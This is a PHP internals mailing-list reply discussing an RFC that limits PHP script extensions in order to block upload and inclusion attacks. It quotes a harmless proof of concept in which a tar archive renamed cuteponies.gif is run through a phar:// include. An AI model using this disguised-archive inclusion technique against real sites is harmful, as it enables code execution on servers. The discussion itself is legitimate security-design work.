Hi Stas, On Wed, Feb 25, 2015 at 7:07 AM, Stanislav Malyshev <smalys...@gmail.com> wrote:
> > They'd need to upload with a matching file type. Instead of any file > > Not sure what you mean by that. phar can read tars, etc. AFAIK, can't > it? Also, phar archive has no requirement of being named something.phar, > afaik can be also named cuteponies.gif. E.g., I just did this: > > 1. Created file chump.php: > > <?php > > include $argv[1]; > > This is an idealized vulnerable script. > > 2. Created file pwnd.php > <?php > > echo "pwnd!"; > > This is an idealized exploit. > > 3. Put it into an archive: > tar cvzf cuteponies.gif pwnd.php > > 4. Run this: > > php -dallow_url_include=0 chump.php phar://cuteponies.gif/pwnd.php > > The output is: > > pwnd! > > I'm not sure how this measure would protect from such scenario. Am I > missing something here? I think he means matching file "extension". File extension should represent file type, though. The new RFC check filename extensions. It allows only ".php", ".phar" as PHP script and move_uploaded_file() restricts moving PHP scripts by default. (Old idea was to detect PHP script by contents. New RFC is to restrict PHP script file extension.) Since "pwnd.php" has ".php" extension, move_uploaded_file() refuses to move it to upload dir by default. As long as user uses default and move_uploaded_file(), they are free from script upload attacks including embedded script. Regards, -- Yasuo Ohgaki yohg...@ohgaki.net
